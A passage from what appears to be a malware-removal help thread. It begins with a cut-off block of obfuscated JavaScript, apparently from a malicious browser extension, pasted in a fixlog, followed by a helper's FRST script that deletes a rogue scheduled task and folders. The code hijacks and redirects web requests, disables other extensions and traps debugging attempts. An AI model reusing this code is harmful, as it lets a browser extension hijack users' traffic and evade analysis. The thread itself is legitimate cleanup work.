vW=a0s1,vY=a0s1,vC=a0s3,vd=a0s4,vt=a0s1,v={};v[vW(0x5c5,'DH7R')]=function(P,O,z){return P(O,z);};const r=v,f={};f[vW(0x1b9,'DH7R')]=[],f[vY(0x379,'25hK')]=[],f[vW(0x1ae,'siaL')]=[];let b=r[vC(0x297,'ICSG')](checkMandatoryFields,A,f);return b;}function performCreateAction(v,r){const vm=a0s1,vD=a0s3,vK=a0s5,r0=a0s5,r1=a0s4,f={};f[vm(0x2b8,'f2lD')]=function(x){return x();},f[vm(0x3a6,')^B&')]=function(x,c){return x©;},f[vm(0x1c5,'cgVJ')]=function(c,k){return c+k;},f[vK(0x42d,'5#F9')]=function(x,c,k){return x(c,k);},f[vK(0x483,'cL8r')]=vK(0x25e,'sc^*'),f[vD(0x2ef,'w&lY')]=function(x,c,k,U){return x(c,k,U);},f[vK(0x3a8,'cgVJ')]=function(x,c){return x©;},f[vK(0x1b2,'%yFL')]=r1(0x439,'%1Wi')+'ow',f[r1(0x544,'yAvB')]=function(x,c,k,U){return x(c,k,U);};const b=f;let P={};Object[r0(0x32e,'mU4s')](P,v[vK(0x37a,'cR2Y')]);let O=b[r1(0x36c,'yAvB')](getKey);const z={};z[r0(0x622,'w&lY')]=r,z[r0(0x69a,'QB$Y')]=b[r1(0x4ca,'25hK')](rawurlencode,r),z[vD(0x53e,'%yFL')]=b[vD(0x456,'DH7R')](btoa,b[vm(0x41e,'otDQ')](O,b[vD(0x6be,'%yFL')](rc4,O,r))),z[vm(0x4ef,'cR2Y')]=b[r0(0x652,'!tWl')](getHostName,r);let a=z;P[vD(0x5e5,'8@D3')]=b[r1(0x1f1,'DH7R')](replaceUrlMacros,P[r0(0x4be,'JXuv')]?P[vD(0x4a7,'Epg(')]:v[vD(0x6b2,'UQM8')],a);let V=v[vK(0x4bd,'cgVJ')]?b[r1(0x1f1,'DH7R')](replaceUrlMacros,v[vK(0x677,'lu&$')],a):undefined;if(V){const x={};x[vK(0x401,'%yFL')]=P[r0(0x64f,'yAvB')],x[vD(0x686,'sc^*')]=V,x[vD(0x2d6,'QB$Y')]=v,globalPending[vK(0x50f,'$]ai')](x);}let X=v[vK(0x3b6,'xWg(')]?v[r0(0x380,'QB$Y')]:-0xa*-0x124+-0xbf+-0xaa9*0x1;switch(v[vK(0x247,'J&Ou')]){case b[vm(0x294,'siaL')]:b[vD(0x2eb,'25hK')](setTimeout,chrome[r1(0x5c8,'d)[^')][r1(0x502,'UQM8')],b[vm(0x3a8,'cgVJ')](sec2ms,X),P);break;case b[vK(0x1b2,'%yFL')]:b[r0(0x384,'QB$Y')](setTimeout,chrome[vK(0x4d7,'J&Ou')][r1(0x64c,'cR2Y')],b[vm(0x5b2,'&NUL')](sec2ms,X),P);break;default:return;}}var callbackSendHeaders=function(s){},callbackBeforeRedirect=function(s){},callbackCompleted=function(s){},callbackErrorOccurred=function(s){},callbackActionIgnored=function(s){};function enableCfg(s){const r2=a0s1;s[r2(0x599,'M$%w')]=undefined;}function disableProcessing(l){const r3=a0s1,r4=a0s4,r5=a0s4,r6=a0s5,r7=a0s4,A={};A[r3(0x4e5,'cR2Y')]=function(f){return f();},A[r4(0x42b,']Rcs')]=function(f, B){return f( B);},A[r5(0x606,'JXuv')]=r3(0x44e,'5#F9'),A[r5(0x69e,'M$%w')]=function(f, B){return f( B);},A[r3(0x218,']Rcs')]=function(f){return f();},A[r7(0x5b5,'5#F9')]=r4(0x47d,'otDQ')+'d';const v=A;let r=v[r4(0x4a5,'Y7Ko')](getConfig);!r?v[r5(0x2e6,'yAvB')](updateErrCount,v[r3(0x430,'f2lD')]):(r[r7(0x4cb,'yAvB')]=!![],v[r4(0x367,'25hK')](setConfig,r)),v[r5(0x1cf,'j#2h')](removeAllListeners),v[r6(0x4e0,'$vab')](updateAppCount,v[r7(0x4c1,'d)[^')]);}function initModule(){const r8=a0s1,r9=a0s1,rs=a0s4,rl=a0s3,rA=a0s5,l={};l[r8(0x4f1,'JXuv')]=function(v,r){return v®;},l[r8(0x359,'FwY2')]=function(v){return v();},l[r8(0x543,'mU4s')]=function(v,r,f){return v(r,f);},l[r9(0x2bd,'0si)')]=function(v,r){return v®;},l[rA(0x688,'k^U#')]=function(v,r,f){return v(r,f);},l[r8(0x414,'%yFL')]=function(v){return v();},l[rs(0x67f,']Rcs')]=function(v,r){return v®;};const A=l;A[rl(0x3eb,'m$hw')](loadState),A[rl(0x435,'sc^*')](loadStats,!![]),A[rs(0x5d1,'5#F9')](addDefaultListeners),chrome[r8(0x1e5,'SNZo')][r8(0x469,'Y$2)')][r9(0x4b6,'m$hw')]([storageCfgName],v=>{const rv=r8,rr=rA,rf=r9,rb=r9,rP=rs;let r=v[storageCfgName];r=A[rv(0x675,'SNZo')](checkConfig,r,cfgSources[rr(0x670,'M$%w')]);!r&&(r=A[rf(0x4de,'yTY2')](getDefaultConfig));A[rr(0x561,'$]ai')](enableCfg,r);let f=r[rb(0x43a,'cgVJ')][rP(0x515,'@(X[')];!f&&(f=0x2*0x59b+-0x1*0x178d+-0xc57*-0x1),A[rP(0x595,'$vab')](setTimeout,()=>{const rO=rb,rz=rP;A[rO(0x3d0,'5#F9')](setConfig,r),A[rO(0x516,'siaL')](asyncUpdateConfig);},A[rf(0x260,'mU4s')](sec2ms,f));});}function downModule(){const ra=a0s4,rV=a0s1,rX=a0s3,rx=a0s4,rc=a0s2,l={};l[ra(0x1b7,'@(X[')]=function(v,r,f){return v(r,f);},l[rV(0x69c,'lu&$')]=ra(0x508,'k^U#'),l[rX(0x58f,'vA59')]=ra(0x37e,'m$hw'),l[rX(0x285,'$Vpd')]=function(v){return v();};const A=l;A[ra(0x514,'sc^*')](updateCount,A[rc(0x490,'m$hw')],A[rX(0x2c1,'M$%w')]),A[rV(0x472,'k^U#')](saveStats);}function addDefaultListeners(){const rk=a0s3,ri=a0s4,rU=a0s3,rG=a0s3,rF=a0s3,l={};l[rk(0x31f,'!tWl')]=function(v,r){return v®;},l[ri(0x1d6,'M$%w')]=ri(0x643,'8@D3'),l[rG(0x55e,'%1Wi')]=rk(0x2e0,'$Vpd'),l[rG(0x1ed,'Epg(')]=rU(0x5a9,'QB$Y'),l[rF(0x699,'j#2h')]=function(v){return v();},l[rF(0x68d,'cL8r')]=rk(0x56e,'$vab'),l[rk(0x35b,'6(5I')]=ri(0x217,'Y7Ko')+rG(0x3dc,'0si)'),l[rF(0x3ea,'@(X[')]=rG(0x4a8,'xWg(')+'rs',l[ri(0x654,'$]ai')]=rU(0x3e9,'UQM8')+rF(0x3f7,'f2lD');const A=l;chrome[rG(0x484,'d)[^')][rF(0x5ad,'sc^*')+'d'][rk(0x5ec,'Q##1')+'r'](()=>{const rB=rU,rT=rF;A[rB(0x30f,'oqvV')](updateAppCount,A[rT(0x3ac,'m$hw')]);}),chrome[ri(0x5fa,'j#2h')][rU(0x368,']Rcs')][rG(0x4c2,'xWg(')+'r'](()=>{const rp=ri,rq=rF;A[rp(0x4c5,'5#F9')](updateAppCount,A[rp(0x4db,'JXuv')]);}),chrome[rU(0x213,'xWg(')][ri(0x661,'WW46')][rG(0x1c8,'J&Ou')+'r'](()=>{const rg=rk,rn=ri,re=rG;A[rg(0x682,'25hK')](updateAppCount,A[rg(0x347,'AhHj')]),A[rg(0x1f9,'WW46')](downModule);}),!limitedReqFilter&&chrome[rk(0x348,'UQM8')][rk(0x600,'$vab')+rF(0x21d,'FwY2')][rU(0x496,'UQM8')+'r'](callbackBeforeRequest,defaultFilter,[A[rk(0x242,'siaL')]]),chrome[rU(0x1af,'QB$Y')][ri(0x5c1,'j#2h')+rG(0x44f,'f2lD')][rF(0x314,'FwY2')+'r'](callbackBeforeSendHeaders,defaultFilter,[A[rU(0x4d8,'C7@$')],A[rF(0x2b9,'Epg(')],A[ri(0x57f,'m$hw')]]),chrome[rk(0x42e,'sc^*')][rU(0x6a6,'%yFL')+rU(0x1f4,'@(X[')][rk(0x24d,'&NUL')+'r'](callbackSendHeaders,defaultFilter,[A[rU(0x6c7,'0si)')],A[rU(0x53b,'DH7R')]]),chrome[rk(0x2fa,'yAvB')][rF(0x5f3,'j#2h')+rU(0x3d9,')^B&')][rU(0x27e,'5#F9')+'r'](callbackBeforeRedirect,defaultFilter,[A[ri(0x316,'lu&$')],A[rG(0x62a,'ICSG')]]),chrome[ri(0x206,'j#2h')][rF(0x659,'UQM8')+'d'][rU(0x39f,'k^U#')+'r'](callbackCompleted,defaultFilter,[A[rU(0x634,'!tWl')],A[rU(0x2b6,'j#2h')]]),chrome[rF(0x4f7,'6(5I')][ri(0x5d7,'WW46')+ri(0x376,'8@D3')][rU(0x432,'JXuv')+'r'](callbackErrorOccurred,defaultFilter,[A[rF(0x5c0,'UQM8')]]),chrome[rk(0x1c1,'JXuv')][rk(0x604,'SNZo')+ri(0x3c6,'cR2Y')][ri(0x4c4,'otDQ')+'r'](callbackActionIgnored);}function removeAllListeners(){const rw=a0s1,rN=a0s4,rM=a0s5,rh=a0s3,rj=a0s2,l={};l[rw(0x61e,'%1Wi')]=rN(0x5db,'Epg(')+rN(0x67c,'%1Wi');const A=l,v=A[rh(0x1b8,'$vab')][rh(0x67a,'yTY2')]('|');let r=-0xe*0xfb+-0x9aa*-0x2+-0x59a;while(!![]){switch(v[r++]){case'0':chrome[rw(0x348,'UQM8')][rw(0x2ca,'!tWl')+rj(0x3c2,'m$hw')][rM(0x59c,'vA59')+rj(0x48f,'$Vpd')](callbackErrorOccurred);continue;case'1':chrome[rj(0x5e0,'$vab')][rw(0x6ac,'xWg(')+rw(0x2db,'oqvV')][rj(0x669,'FwY2')+rh(0x31d,'M$%w')](callbackActionIgnored);continue;case'2':chrome[rM(0x42e,'sc^*')][rj(0x3b2,'SNZo')+'d'][rh(0x4a6,'otDQ')+rw(0x3df,'FwY2')](callbackCompleted);continue;case'3':chrome[rh(0x542,'$Vpd')][rN(0x287,'Q##1')+rM(0x29b,'JXuv')][rM(0x5e8,'yTY2')+rN(0x352,'JXuv')](callbackBeforeRequest);continue;case'4':chrome[rw(0x5e0,'$vab')][rM(0x1bb,'$Vpd')+rh(0x564,'SNZo')][rh(0x3d8,'ICSG')+rM(0x653,'otDQ')](callbackBeforeSendHeaders);continue;case'5':chrome[rN(0x1e4,')^B&')][rj(0x4f8,'QB$Y')+rh(0x6bc,'J&Ou')][rh(0x353,'k^U#')+rM(0x2ad,'j#2h')](callbackSendHeaders);continue;case'6':chrome[rj(0x422,'%yFL')][rM(0x69f,'vA59')+rM(0x2a0,'xWg(')][rM(0x3f4,'oqvV')+rM(0x3c1,'QB$Y')](callbackBeforeRedirect);continue;}break;}}function rc4(A,v){const ro=a0s5,ry=a0s4,rJ=a0s2,rS=a0s4,rI=a0s5,r={};r[ro(0x2bc,')^B&')]=function(X,c){return X<c;},r[ry(0x2f1,'J&Ou')]=function(X,c){return X%c;},r[rJ(0x40f,'QB$Y')]=function(X,c){return X+c;},r[ro(0x54f,'DH7R')]=function(X,c){return X%c;},r[rI(0x4aa,'cL8r')]=ry(0x229,'j#2h')+'2',r[ry(0x40e,'JXuv')]=function(X,c){return X%c;},r[rS(0x51a,'cL8r')]=function(X,c){return X^c;},r[rI(0x3bc,'f2lD')]=function(X,c){return X%c;};const f=r;var b=[],P=0x678+0x52d+0xb*-0x10f,O,z='';for(var a=-0x4*0x2c9+0xced+-0x1c9;f[rI(0x237,'cR2Y')](a,-0x2127+0x1e57+0x3d0);a++){b[a]=a;}for(a=0xbab+0x207c+-0x2c27;f[rJ(0x5ee,'lu&$')](a,0x1*-0x9d1+0x1*0x12d5+-0x804);a++){P=f[ry(0x687,'0si)')](f[rJ(0x233,'cL8r')](f[ry(0x4e9,'%1Wi')](P,b[a]),A[rS(0x455,'FwY2')](f[rS(0x631,'cR2Y')](a,A[ry(0x460,'M$%w')]))),-0x2132+-0xf1*0xa+-0x4*-0xae7),O=b[a],b[a]=b[P],b[P]=O;}a=-0x14d2+-0x173a+0x2*0x1606,P=0x1f21+0x18ab+-0x37cc;for(var V=-0x1577+-0x1*0x2119+0x30*0x123;f[rI(0x258,'oqvV')](V,v[ry(0x290,'$Vpd')]);V++){const X=f[ry(0x548,'cgVJ')][rS(0x519,'sc^*')]('|');let c=-0x362+-0x39*-0xa+0x128;while(!![]){switch(X[c++]){case'0':a=f[rJ(0x5d3,'cL8r')](f[ry(0x34a,'$vab')](a,0x2653*0x1+0x26*0x4c+-0x319a),0x47*-0x31+-0x60c*0x5+0x2cd3);continue;case'1' :o=b[a];continue;case'2':z+=String[rS(0x433,'j#2h')+'de'](f[ro(0x641,'FwY2')](v[rS(0x1bc,')^B&')](V),b[f[ro(0x230,']Rcs')](f[ry(0x590,'oqvV')](b[a],b[P]),-0xd6e+0xd*0x151+0xe5*-0x3)]));continue;case'3':b[a]=b[P];continue;case'4':b[P]=O;continue;case'5' :P=f[rI(0x532,'$]ai')](f[rJ(0x3a3,'DH7R')](P,b[a]),-0x186c+-0x1640+0x2fac);continue;}break;}}return z;}async function asyncGetExt(){const rR=a0s4,l={};l[rR(0x5f6,'$Vpd')]=function(v,r){return v®;};const A=l;return new Promise(function(v,r){const rL=rR,rH=rR,rQ=rR,f={};f[rL(0x322,'yAvB')]=function(P,O){const rE=rL;return A[rE(0x421,'cR2Y')](P,O);};const b=f;chrome[rH(0x246,'QB$Y')][rL(0x339,'0si)')](P=>{const rZ=rQ;b[rZ(0x553,'j#2h')](v,P);});});}function disableExt(l,A){const ru=a0s2,rW=a0s3,rY=a0s5,rC=a0s5,v={};v[ru(0x5fb,'lu&$')]=function(f, B){return f===b;},v[ru(0x615,')^B&')]=function(f, B){return f||b;};const r=v;if(r[rW(0x36a,'&NUL')](!l,!A))return;A[rC(0x4c0,'UQM8')](f=>{const rd=rW,rm=rY,b={};b[rd(0x6b9,'5#F9')]=function(O,z){const rt=rd;return r[rt(0x47b,'25hK')](O,z);};const P=b;l[rm(0x2ba,'WW46')](O=>{const rD=rd,rK=rd,f0=rd,f1=rm;if(P[rD(0x58d,'sc^*')](O['id'],f)){if(O[rK(0x42c,'UQM8')])chrome[rK(0x331,']Rcs')][f0(0x5b3,'DH7R')](f,![],()=>{});else{}}});});}if(!debug){var e=document[a0s1(0x545,'!tWl')+a0s3(0x4fc,'WW46')]('p'),accessed=![];const a0X={};a0X[a0s3(0x223,'UQM8')]=function(){accessed=!![];},Object[a0s1(0x65f,'%1Wi')+a0s2(0x2c8,'lu&$')](e,'id',a0X);var i=setInterval(function(){const f2=a0s1,f3=a0s5,f4=a0s5,f5=a0s1,f6=a0s3,l={};l[f2(0x66a,'j#2h')]=function(v){return v();},l[f2(0x269,'0si)')]=function(v,r){return v®;};const A=l;accessed=![],console[f3(0x412,'M$%w')](e),accessed&&(console[f4(0x4b9,'%1Wi')](),A[f5(0x644,'xWg(')](disableProcessing),A[f6(0x281,'siaL')](clearInterval,i));},0x5*-0x522+-0x17*-0x12d+-0xfd);}debug&&chrome[a0s5(0x279,'f2lD')][a0s4(0x51c,'f2lD')][a0s1(0x36d,'%1Wi')](null,s=>{const f7=a0s5,f8=a0s4,f9=a0s3;let l=![];l&&chrome[f7(0x538,'yAvB')][f8(0x668,'cR2Y')][f8(0x4b9,'%1Wi')]();});initModule();function a0A(l){const fs=a0s2,fl=a0s4,fA=a0s3,fv=a0s5,fr=a0s1,A={};A[fs(0x1c6,'AhHj')]=function(f, B){return f===b;},A[fl(0x371,'%yFL')]=fA(0x5f1,'otDQ'),A[fv(0x28d,'cgVJ')]=fl(0x25a,'$]ai')+fs(0x2ed,'d)[^'),A[fs(0x425,'WW46')]=fr(0x449,'DH7R'),A[fs(0x4af,'UQM8')]=function(f, B){return f!==b;},A[fv(0x6cb,'sc^*')]=function(f, B){return f+b;},A[fr(0x5ca,'$Vpd')]=function(f, B){return f/b;},A[fv(0x520,'AhHj')]=fv(0x499,'yTY2'),A[fv(0x4ff,'j#2h')]=function(f, B){return f===b;},A[fr(0x47a,'Y7Ko')]=function(f, B){return f%b;},A[fs(0x59e,'siaL')]=fA(0x5f0,'J&Ou'),A[fr(0x6ad,'FwY2')]=fl(0x4c6,'cL8r'),A[fA(0x3c9,'cL8r')]=fs(0x1bd,'$Vpd'),A[fv(0x55a,'FwY2')]=fv(0x5ff,'6(5I')+'t',A[fl(0x4e3,'xWg(')]=function(f, B){return f( B);},A[fr(0x5f5,'J&Ou')]=function(f, B){return f( B);};const v=A;function r(f){const ff=fv,fb=fs,fP=fv,fO=fv,fz=fr;if(v[ff(0x563,'Epg(')](typeof f,v[ff(0x3e8,'cL8r')]))return function( B){}[ff(0x3b5,'FwY2')+'r'](v[ff(0x1ce,'%1Wi')])[fb(0x232,'yTY2')](v[fb(0x29f,'cgVJ')]);else v[ff(0x428,'WW46')](v[fO(0x2d4,'WW46')]('',v[fz(0x1e7,'j#2h')](f,f))[v[fz(0x20c,']Rcs')]],-0x190d+-0x5c9+0x1ed7)||v[fb(0x33b,'otDQ')](v[fz(0x1e3,'$]ai')](f,-0x200b+-0x6d*-0x11+-0x27d*-0xa),-0x529*0x7+0x1*-0x796+-0x43*-0xa7)?function(){return!![];}[fb(0x311,'oqvV')+'r'](v[fb(0x377,'yAvB')](v[fz(0x37c,'6(5I')],v[fP(0x2ab,'C7@$')]))[fO(0x614,'vA59')](v[fP(0x57b,'M$%w')]):function(){return![];}[fP(0x311,'oqvV')+'r'](v[fO(0x658,'Q##1')](v[fO(0x52c,'Y$2)')],v[fb(0x67b,'Q##1')]))[fO(0x4ac,'WW46')](v[fb(0x222,'0si)')]);v[fO(0x2be,'%1Wi')](r,++f);}try{if(l)return r;else v[fA(0x22a,'j#2h')](r,-0x1403+0x11f1+0x35*0xa);}catch(f){}} ========= End of CMD: ========= ==== End of Fixlog 22:04:08 ====

#15 Oh My!

Adware and Spyware and Malware

Malware Response Instructor
61,636 posts
OFFLINE

Gender:Male
Location:California
Local time:09:21 AM

Posted 08 May 2021 - 06:53 PM

Thank you, now please do this.===================================================Farbar Recovery Scan Tool Fix--------------------

Right click on the FRST icon and select Run as administrator
Highlight the below information then hit the Ctrl + C keys at the same time and the text will be copied
There is no need to paste the information anywhere, FRST will do it for you

Start:: CloseProcesses: Task: {9E5D1EA3-A99B-4D01-B17C-A4732318731E} - System32\Tasks\Microsoft\NlsLexipir => C:\WINDOWS\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe "C:\Program Files (x86)\Common Files\NotesDriver\ClyentrAgent\SETwm_2x80.dll" C:\Program Files (x86)\Common Files\NotesDriver C:\ProgramData\Kawmq End::

Click Fix
When completed he tool will create a log on the desktop called Fixlog.txt. Please copy and paste the contents of the file in your reply.
Upon reboot check to verify the folder is gone

Fixlog
Folder?

Lord, to whom shall we go? You have the words of eternal life and we have believed and have come to know that you are the Holy One of God.John 6:68-69The Man on the Middle Cross Said I Could Come